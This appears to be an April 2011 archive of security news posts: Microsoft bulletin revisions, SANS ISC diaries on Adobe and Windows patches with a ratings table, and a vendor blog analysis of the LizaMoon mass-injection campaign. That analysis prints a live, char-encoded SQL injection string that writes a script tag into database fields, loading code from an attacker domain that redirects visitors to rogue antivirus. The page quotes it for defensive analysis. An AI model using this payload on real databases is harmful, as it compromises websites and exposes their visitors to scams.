April 2011 - Posts

********************************************************************

Title: Microsoft Security Bulletin Re-Releases

Issued: April 21, 2011

********************************************************************

 

Summary
=======

The following bulletins have undergone a major revision increment.

Please see the appropriate bulletin for more details.

 

  * MS11-025 - Important

 

Bulletin Information:
=====================

 

* MS11-025 - Important

 

 - http://www.microsoft.com/technet/security/bulletin/ms11-025.mspx

 - Reason for Revision: V2.0 (April 21, 2011): Rereleased bulletin

    to reoffer the updates to address a detection issue. There

    were no changes to the security update files in this

    bulletin. Customers who have already successfully updated

    their systems do not need to reinstall this update. 

 - Originally posted: April 12, 2011

 - Updated: April 21, 2011

 - Bulletin Severity Rating: Important

 - Version: 2.0

       

 

Adobe Reader and Acrobat Security Updates
Published: 2011-04-21,
Last Updated: 2011-04-21 17:41:20 UTC
by Guy Bruneau (Version: 1)

Adobe released important security updates for Adobe Reader X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh OS. The bulletin is posted here [1].

"CVE-2011-0611, is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat, as well as via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment targeting the Windows platform. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing."[1]


Affected software:

Adobe Reader X (10.0.1) and earlier versions for Windows
Adobe Reader X (10.0.2) and earlier versions for Macintosh
Adobe Acrobat X (10.0.2) and earlier versions for Windows and Macintosh

NOTE: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by CVE-2011-0611.


[1] http://www.adobe.com/support/security/bulletins/apsb11-08.html

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
Silverlight Update Available
Published: 2011-04-21,
Last Updated: 2011-04-21 17:26:09 UTC
by Guy Bruneau (Version: 2)

Microsoft has issued a security patch for Silverlight KB2526954. It fixes six issues. However, the Microsoft link to KB2526954 is still not live. If you have Microsoft update running, it is ready to install. This is rated as important and will auto install.

Direct download http://go.microsoft.com/fwlink/?LinkID=149156

Update 1: The Microsoft bulletin is now posted here [2].

[1] http://www.microsoft.com/getsilverlight/Get-Started/Install/Default.aspx

[2] http://support.microsoft.com/kb/2526954


-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

MS11-020 (KB2508429) Upgrading from Critical to PATCH NOW
Published: 2011-04-15,
Last Updated: 2011-04-15 12:22:18 UTC
by Kevin Liston (Version: 2)

Based on notifications received from Microsoft we are upgrading the rating of MS11-020 (KB 2508429, CVE-2011-0661) from Critical to PATCH NOW. See: http://isc.sans.edu/diary.html?storyid=10693 for the full table.

The Remote Code Exploit is possible without authentication, so this presents a serious risk to internal networks. Think Downadup/Conficker, or think lateral movement if that will help motivate patching.

Also note that this patch requires a reboot of your system.

Please submit any reports of weaponization/exploits, or impacts from applying the patch.

Sorry.

-KL

********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: April 13, 2011

********************************************************************

 

Summary
=======

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

 

  * MS11-019 - Critical

  * MS11-017 - Important

 

Bulletin Information:
=====================

 

* MS11-019 - Critical

 

  - http://www.microsoft.com/technet/security/bulletin/ms11-019.mspx

  - Reason for Revision: V1.1 (April 13, 2011): Clarified the

    vulnerability description in the Executive Summary. 

  - Originally posted: April 12, 2011

  - Updated: April 13, 2011

  - Bulletin Severity Rating: Critical

  - Version: 1.1

   

* MS11-017 - Important

 

  - http://www.microsoft.com/technet/security/bulletin/ms11-017.mspx

  - Reason for Revision: V1.3 (April 13, 2011): Corrected the

    bulletin replacement information for Remote Desktop

    Connection 6.0 Client on supported editions of Windows Server

    2003 and Remote Desktop Connection 6.1 Client on supported

    editions of Windows Vista. This is a bulletin change only.

    There were no changes to the detection or security update files. 

  - Originally posted: March 8, 2011

  - Updated: April 13, 2011

  - Bulletin Severity Rating: Important

  - Version: 1.3

       

Published: 2011-04-14,
Last Updated: 2011-04-14 02:20:45 UTC
by Johannes Ullrich (Version: 1)

Adobe updated its advisory, stating that we should have a patch at least for the "non sandbox" versions of Adobe Acrobat and Reader by April 25th [1]. Flash Player will get a fix even earlier (April 15th, this week Friday). Adobe Reader X for Windows, which uses the new "Protected Mode" feature to limit the exploitability of this vulnerability, will have to wait until June 25th.

Little table to clarify:

             Flash   Reader 9   Reader 10.x   Reader 10.0.1   Reader 10.0.2 aka "X"
Windows      4/15    4/25       4/25          4/25            6/25
Macintosh    4/15    4/25       4/25          4/25            4/25

 

For more details, see the URL below.

[1] http://www.adobe.com/support/security/advisories/apsa11-02.html

------


********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: April 12, 2011

********************************************************************

 

Summary
=======

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

 

  * MS11-025 - Important

  * MS10-088 - Important

  * MS10-087 - Critical

 

Bulletin Information:
=====================

 

* MS11-025 - Important

 

  - http://www.microsoft.com/technet/security/bulletin/ms11-025.mspx

  - Reason for Revision: V1.1 (April 12, 2011): Clarified the update

    FAQ, "I am a third-party application developer and I use

    Visual C++. How do I update my application?" 

  - Originally posted: April 12, 2011

  - Updated: April 12, 2011

  - Bulletin Severity Rating: Important

  - Version: 1.1

   

* MS10-088 - Important

 

  - http://www.microsoft.com/technet/security/bulletin/ms10-088.mspx

  - Reason for Revision: V1.3 (April 12, 2011): Announced that the

    security update for Microsoft Office 2004 for Mac (KB2505924)

    offered in MS11-021, MS11-022, and MS11-023 also addresses

    the vulnerabilities described in this security bulletin. 

  - Originally posted: November 9, 2010

  - Updated: April 12, 2011

  - Bulletin Severity Rating: Important

  - Version: 1.3

   

* MS10-087 - Critical

 

  - http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx

  - Reason for Revision: V2.1 (April 12, 2011): Announced that the

    security update for Microsoft Office 2004 for Mac (KB2505924)

    offered in MS11-021, MS11-022, and MS11-023 also addresses

    the vulnerabilities described in this security bulletin. 

  - Originally posted: November 9, 2010

  - Updated: April 12, 2011

  - Bulletin Severity Rating: Critical

  - Version: 2.1

       

********************************************************************

Title: Microsoft Security Advisory Notification

Issued: April 12, 2011

********************************************************************

 

Security Advisories Updated or Released Today
==============================================

 

 * Microsoft Security Advisory (973811)

  - Title: Extended Protection for Authentication

  - http://www.microsoft.com/technet/security/advisory/973811.mspx

  - Revision Note: V1.12 (April 12, 2011): Updated the FAQ with

    information about a non-security update enabling Microsoft

    Outlook to opt in to Extended Protection for Authentication.

 * Microsoft Security Advisory (2506014)

  - Title: Update for the Windows Operating System Loader

  - http://www.microsoft.com/technet/security/advisory/2506014.mspx

  - Revision Note: V1.0 (April 12, 2011): Advisory published.

 * Microsoft Security Advisory (2501696)

  - Title: Vulnerability in MHTML Could Allow

    Information Disclosure

  - http://www.microsoft.com/technet/security/advisory/2501696.mspx

  - Revision Note: V2.0 (April 12, 2011): Advisory updated to

    reflect publication of security bulletin.

 * Microsoft Security Advisory (2501584)

  - Title: Release of Microsoft Office File Validation

    for Microsoft Office

  - http://www.microsoft.com/technet/security/advisory/2501584.mspx

  - Revision Note: V1.0 (April 12, 2011): Advisory published.

 * Microsoft Security Advisory (2269637)

  - Title: Insecure Library Loading Could Allow Remote

    Code Execution

  - http://www.microsoft.com/technet/security/advisory/2269637.mspx

  - Revision Note: V7.0 (April 12, 2011): Added the following

    Microsoft Security Bulletins to the Updates relating to

    Insecure Library Loading section: MS11-023, "Vulnerabilities

    in Microsoft Office Could Allow Remote Code Execution;" and

    MS11-025, "Vulnerability in Microsoft Foundation Class (MFC)

    Library Could Allow Remote Code Execution."   

 

April 2011 Microsoft Black Tuesday Summary
Published: 2011-04-11,
Last Updated: 2011-04-12 18:03:20 UTC
by Jim Clausing (Version: 2)

Here are the April 2011 Black Tuesday patches.  Enjoy!
 

Overview of the April 2011 Microsoft Patches and their status.
 

Columns of the original table: # (bulletin) | Affected | Contra Indications (KB article) | Known Exploits | Microsoft rating (severity; exploitability index, one value per CVE) | ISC rating(*) for clients / servers

MS11-018  Cumulative Security Update for Internet Explorer (replaces MS11-003)
  Affected:           Internet Explorer 6-8
  CVEs:               CVE-2011-0094, CVE-2011-0346, CVE-2011-1244, CVE-2011-1245, CVE-2011-1345
  Contra indications: KB 2497640
  Known exploits:     ACTIVELY EXPLOITED
  Microsoft rating:   Severity: Critical; Exploitability: 1,1,?,3,1
  ISC rating:         clients PATCH NOW! / servers Critical

MS11-019  Vulnerabilities in SMB Client Could Allow Remote Code Execution (replaces MS10-020)
  Affected:           Windows
  CVEs:               CVE-2011-0654, CVE-2011-0660
  Contra indications: KB 2511455
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 2,1
  ISC rating:         clients Critical / servers Critical

MS11-020  Vulnerability in SMB Server Could Allow Remote Code Execution (replaces MS10-012, MS10-054)
  Affected:           Windows
  CVEs:               CVE-2011-0661
  Contra indications: KB 2508429
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 1
  ISC rating:         clients Critical / servers Critical

MS11-021  Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (replaces MS10-080, MS10-087)
  Affected:           Office XP SP3-2010, Office 2004-2011 for Mac, Open XML File Format Converter, Excel Viewer SP2, Office Compatibility Pack for 2007 file formats
  CVEs:               CVE-2011-0097, CVE-2011-0098, CVE-2011-0101, CVE-2011-0103, CVE-2011-0104, CVE-2011-0105, CVE-2011-0978, CVE-2011-0979, CVE-2011-0980
  Contra indications: KB 2489279
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Important; Exploitability: 1,1,1,2,2,2,1,1,1
  ISC rating:         clients Important / servers Important

MS11-022  Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (replaces MS09-017, MS10-036, MS10-087, MS10-088)
  Affected:           PowerPoint
  CVEs:               CVE-2011-0655, CVE-2011-0656, CVE-2011-0976
  Contra indications: KB 2489283
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Important; Exploitability: 2,2,1
  ISC rating:         clients Important / servers Important

MS11-023  Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (replaces MS10-087)
  Affected:           Office XP - 2007, Office 2004 - 2008 for Mac, Open XML File Format Converter
  CVEs:               CVE-2011-0107, CVE-2011-0977
  Contra indications: KB 2489293
  Known exploits:     POC Available
  Microsoft rating:   Severity: Important; Exploitability: 1,2
  ISC rating:         clients Important / servers Important

MS11-024  Vulnerability in Windows Fax Cover Page Editor Could Allow Remote Code Execution
  Affected:           Fax Services, Fax Server Role
  CVEs:               CVE-2010-3974
  Contra indications: KB 2527308
  Known exploits:     POC Available
  Microsoft rating:   Severity: Important; Exploitability: 3
  ISC rating:         clients Critical / servers Important

MS11-025  Vulnerability in Microsoft Foundation Class (MFC) Library Could Allow Remote Code Execution
  Affected:           Visual Studio .NET 2003 - 2010, Visual C++ 2005 - 2010 Redistributable Package
  CVEs:               CVE-2010-3190
  Contra indications: KB 2500212
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Important; Exploitability: 1
  ISC rating:         clients Important / servers Important

MS11-026  Vulnerability in MHTML Could Allow Information Disclosure
  Affected:           MHTML
  CVEs:               CVE-2011-0096
  Contra indications: KB 2503658
  Known exploits:     ACTIVELY EXPLOITED
  Microsoft rating:   Severity: Important; Exploitability: 3
  ISC rating:         clients PATCH NOW! / servers Important

MS11-027  Cumulative Security Update of ActiveX Kill Bits (replaces MS10-034)
  Affected:           Windows XP - 7, Server 2003-2008
  CVEs:               CVE-2010-0811, CVE-2010-3973, CVE-2011-1243
  Contra indications: KB 2508272
  Known exploits:     POC Available
  Microsoft rating:   Severity: Critical; Exploitability: ?,?,?
  ISC rating:         clients Critical / servers Critical

MS11-028  Vulnerability in .NET Framework Could Allow Remote Code Execution (replaces MS09-061, MS10-060, MS10-077)
  Affected:           .NET Framework (all supported versions)
  CVEs:               CVE-2010-3958
  Contra indications: KB 2484015
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 1
  ISC rating:         clients Critical / servers Critical

MS11-029  Vulnerability in GDI+ Could Allow Remote Code Execution (replaces MS09-062, MS10-087)
  Affected:           Windows XP-Vista, Windows Server 2003-2008, Office XP
  CVEs:               CVE-2011-0041
  Contra indications: KB 2489979
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 1
  ISC rating:         clients Critical / servers Critical

MS11-030  Vulnerability in DNS Resolution Could Allow Remote Code Execution (replaces MS08-020, MS08-037, MS08-066)
  Affected:           Windows XP - 7, Windows Server 2008
  CVEs:               CVE-2011-0657
  Contra indications: KB 2509553
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 2
  ISC rating:         clients Critical / servers Critical

MS11-031  Vulnerability in JScript and VBScript Scripting Engines Could Allow Remote Code Execution (replaces MS09-045, MS10-022, MS11-009)
  Affected:           OpenType Compact Font Format (CFF) driver
  CVEs:               CVE-2011-0663
  Contra indications: KB 2514666
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 2
  ISC rating:         clients Critical / servers Important

MS11-032  Vulnerability in the OpenType Compact Font Format (CFF) Driver Could Allow Remote Code Execution (replaces MS11-007)
  Affected:           OpenType Compact Font Format (CFF) driver
  CVEs:               CVE-2011-0034
  Contra indications: KB 2507618
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Critical; Exploitability: 3
  ISC rating:         clients Critical / servers Important

MS11-033  Vulnerability in WordPad Text Converters Could Allow Remote Code Execution (replaces MS10-067)
  Affected:           Microsoft WordPad
  CVEs:               CVE-2011-0028
  Contra indications: KB 2485663
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Important; Exploitability: 1
  ISC rating:         clients Important / servers Important

MS11-034  Elevation of Privilege Vulnerabilities in Windows Kernel-Mode Drivers (replaces MS10-012)
  Affected:           Kernel Mode Drivers
  CVEs:               CVE-2011-0662, CVE-2011-0665, CVE-2011-0666, CVE-2011-0667, CVE-2011-0670, CVE-2011-0671, CVE-2011-0672, CVE-2011-0673, CVE-2011-0674, CVE-2011-0675,
                      CVE-2011-0676, CVE-2011-0677, CVE-2011-1225, CVE-2011-1226, CVE-2011-1227, CVE-2011-1228, CVE-2011-1229, CVE-2011-1230, CVE-2011-1231, CVE-2011-1232,
                      CVE-2011-1233, CVE-2011-1234, CVE-2011-1235, CVE-2011-1236, CVE-2011-1237, CVE-2011-1238, CVE-2011-1239, CVE-2011-1240, CVE-2011-1241, CVE-2011-1242
  Contra indications: KB 2506223
  Known exploits:     No Known Exploits
  Microsoft rating:   Severity: Important; Exploitability: 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,3,1,1,1,1
  ISC rating:         clients Important / servers Important

 

We will update issues on this page for about a week or so as they evolve. We appreciate updates.

US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY.

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
---------------
Jim Clausing, GIAC GSE #26
Yet another Adobe Flash/Reader/Acrobat 0 day
Published: 2011-04-11,
Last Updated: 2011-04-11 22:33:13 UTC
by Johannes Ullrich (Version: 1)

Adobe reported that a so far unpatched vulnerability has been used in recent targeted attacks [1].

Flash Player 10.2.153.1 is vulnerable, as is the Flash Player component used to execute Flash in Adobe Reader / Acrobat. Adobe Reader X is vulnerable but not exploitable.

At this time, according to Adobe, the attack is performed using Flash files embedded in Word documents.

Note that Flash may be embedded in other Office document formats like Excel. Adobe is not planning on an out of band patch at this point, as Adobe Reader X is not exploitable.

[1] http://www.adobe.com/support/security/advisories/apsa11-02.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Update on LizaMoon mass-injection and Q&A
Posted: 31 Mar 2011 01:03 PM

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon.com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down.

 

 

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

 


 

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

 

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

 

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

 

More information is available over on Stackoverflow.com.

 

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

 


What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

 

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

 

 

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

 

 

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.


So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

 

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

 

Questions & Answers about the LizaMoon mass-injection

 

Q: Why is this called LizaMoon?
A: The first domain we saw on March 29, 2011 was called lizamoon.com

 

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

 

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. So far we have only had reports of Microsoft SQL Server 2003 and 2005 being affected, so if you have any information that says that 2008 has been hit as well, we'd like to know about it.

 

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: We don't know, but we don't think so. Most likely there are vulnerabilities in the Web systems used by these sites, such as outdated CMS and blog systems.

 

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

 

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

 

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.